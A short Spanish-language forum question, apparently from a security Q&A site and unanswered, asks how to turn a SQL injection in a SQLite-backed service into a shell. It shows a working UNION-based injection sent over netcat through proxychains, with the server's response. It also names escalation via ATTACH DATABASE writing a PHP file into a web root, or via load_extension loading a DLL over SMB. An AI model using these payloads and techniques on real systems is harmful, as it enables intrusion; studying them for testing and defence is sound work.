Desde SQL Injection en SQLite hasta shell

0

Necesito obtener un shell de una inyección SQL sobre una aplicación con la base de datos sqlite.

Actualmente mi exploit se parece a lo siguiente:

lucian@0x90:~/$ proxychains nc 10.185.10.55 1101
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9999-<><>-10.185.10.55:1101-<><>-OK
Input please:
1 UNION ALL SELECT 42,'qvzbq'||'LOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzV'||'qzzxq',42;-- sdasdasd
1 UNION ALL SELECT 42,'qvzbq'||'LOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzV'||'qzzxq',42;-- sdasdasd

Parsing results... 
Customer information: Damy Roali qvzbqLOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzVqzzxq 42 


lucian@0x90:~/$ 

Siguiendo este enlace enlace descubrí que puedo ADJUNTAR LA BASE DE DATOS (creando un archivo .php en la raíz del documento de una carpeta web) o load_extension (cargando un archivo dll desde una ruta smb) para obtener el shell.

¿Es esto predeterminado en SQLite o debo habilitar algo o verificar algo?

    
pregunta Lucian Nitescu 07.08.2018 - 16:18
fuente

0 respuestas

Lea otras preguntas en las etiquetas